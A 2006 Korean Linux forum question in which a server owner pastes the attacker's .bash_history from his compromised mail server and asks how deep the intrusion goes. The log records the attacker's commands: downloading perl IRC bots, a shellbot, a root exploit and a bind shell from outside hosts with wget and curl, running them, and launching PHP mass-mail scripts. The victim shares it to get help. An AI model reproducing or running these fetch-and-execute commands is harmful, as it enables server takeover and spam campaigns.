메뉴
검색
클라우드포털

질문&답변

클라우드/리눅스에 관한 질문과 답변을 주고 받는 곳입니다.

리눅스

서버의 해킹정도를 알려주세요.

정길현 작성
작성일 2006.01.23 00:19

2,967 조회
0 추천
목록

최저가 서버호스팅 제공 : 85,000원/월

증상

저희 메일서버를 통해 매일 엄창난 메일을 발송합니다.

1. /tmp 에 cgi(실행파일), cmd.gif(폴더:메일발송문서), bot.txt:chmod(perl 소스파일) 등이 존재합니다.

2. ps -aux 하면 ./cgi, sh -i, bindz 프로세스가 떠있습니다.

3. /tmp 에서 .bash_history를 확인하면 아래와 같이 있습니다.

cd ..
ls
wget
cd /tmp
wget http://perso.wanadoo.es/louzape/tt.txt
cd /tmp;wget http://www.afroman.as.ro/bot.txt;chmod +x bot.txt;perl bot.txt;perl bot.txt
cd /tmp
wget http://perso.wanadoo.es/paparazz0/dd.html
GET http://perso.wanadoo.es/paparazz0/dd.html > dd.html
GET http://perso.wanadoo.es/paparazz0/teste.txt > teste.txt
GET http://perso.wanadoo.es/paparazz0/cc.txt > cc.txt
php cc.txt teste.txt dd.html
GGET http://perso.wanadoo.es/paparazz0/a.txt > a.txt
GET http://perso.wanadoo.es/paparazz0/a
GET http://perso.wanadoo.es/paparazz0/t3.txt > t3.txt
php cc.txt t3.txt dd.html
cd /tmp
rm bot.txt
ls
cd /tmp;wget http://www.afroman.as.ro/bot.txt;chmod +x bot.txt;perl bot.txt;perl bot.txt;cd /tmp;GET www.afroman.as.ro/bot.txt > bot.txt:chmod +x bot.txt;perl bot.txt;perl bot.txt
cd /tmp
ls
rm -fr *.txt
rm -fr *.htm
rm -fr *.html
ls
ls
wget www.cartaomusicalcards.com/vai.txt
get www.cartaomusicalcards.com/vai.txt
wget www.cartaomusicalcards.com/vai.txt
ps x
ls
id
cd /tmp
ls
php -v
mkdir cmd.gif
ls
cd cmd.gif
ls
wget http://groupiys.com/xpl/rootedoor
curl
curl -o rootdoor http://groupiys.com/xpl/rootedoor
ls
chmod 777 rootedoor
chmod 777 rootedor
ls
chmod 777 rootdoor
ls
./rootdoor
curl -o bindz http://groupiys.com/xpl/bindz
chmod 777 bindz
./bindz
killall -9 cgi
killall -9 cgi
cd tmp
ls
cd cmd.gif
ls
curl -o shell.txt http://www.lapizlopez.cl/shellbot.txt
ls
perl shell.txt
killall -9 php
cd /etc
ls
chmod 777 proc
cd /tmp/cmd.
cd /tmp/cmd.gif
ls
pwd
rm -rf *
w
uname -a
uptime
php -v
curl
curl -o cards.htmll
curl -o cards.html http://www.lapizlopez.cl/cards.html
ls
curl -o http://www.lapizlopez.cl/test.txt
ls
curl -o test.txt http://www.lapizlopez.cl/test.txt
ls
curl -o card.txt http://www.lapizlopez.cl/card.txt;ls
php -e card.txt test.txt cards.html
curl -o lista.4.txt http://www.lapizlopez.cl/lista4.txt
ls
php -e card.txt lista.4.txt cards.html;php -e card.txt test.txt cards.html
ps x

확인 후 빠른 답변좀 부탁 드립니다.

이전

잘되던 DNS가 갑자기 이상합니다...

작성일 2006.01.23 10:37
다음

서버의 해킹정도를 알려주세요.

작성일 2006.01.27 10:41

댓글 0

등록된 댓글이 없습니다.

로그인한 회원만 댓글 등록이 가능합니다.

목록

공지사항

등록일 09.15

네이버클라우드 콘솔(console) 실무작업 강좌를 시작합니다.
등록일 09.13

네이버클라우드 자격증 NCE 요약강의를 시작하였습니다.
등록일 06.05

쉘프로그래밍(shell programming)강좌를 시작했습니다.
등록일 05.25

록키리눅스(RockyLinux) 강좌를 시작했습니다.
등록일 01.10

리눅스마스터 자격증 강좌를 업로드하고 있습니다.
등록일 01.10

클라우드와 리눅스 보안강좌 업로드 중입니다.
등록일 08.09

파이썬 강좌를 시작합니다.

뉴스광장

등록일 05.03

에이콘아카데미 강남, 자바(JAVA)중심 풀스택 캠프
등록일 05.03

더조은아카데미 종로, 빅데이터분석(with 파이썬)과 엘라스틱서치를 활용한 자바(Java)웹개발자양성
등록일 05.03

[솔데스크] GPT-풀스택.AI 국비무료취업교육
등록일 05.03

(5/16 개강) 백엔드 부트캠프 : 비전공자 선수학습 특강+강사만족도 4.6+백엔드 개발자 필수커리큘럼
등록일 05.02

(6/17개강) 강사만족도 4.9 강보람 강사의 백엔드 부트캠프 84기 모집
등록일 05.02

????[취업과정 8기] 전공무관 웹 개발자 양성 무료 교육(5월)
등록일 05.02

[★고용노동부 5년인증 우수훈련기관] 전액국비지원 기업형 실무 인재 양성 자바웹개발자 과정!
등록일 05.01

에이콘아카데미 강남, 자바(JAVA)중심 풀스택 캠프
등록일 05.01

더조은아카데미 종로, 빅데이터분석(with 파이썬)과 엘라스틱서치를 활용한 자바(Java)웹개발자양성
등록일 04.30

[멀티캠퍼스] 2024년 서울형 청년인턴 직무캠프

현재 회원수 : 60,037 명
현재 강좌수 : 35,810 개
현재 접속자 : 97 명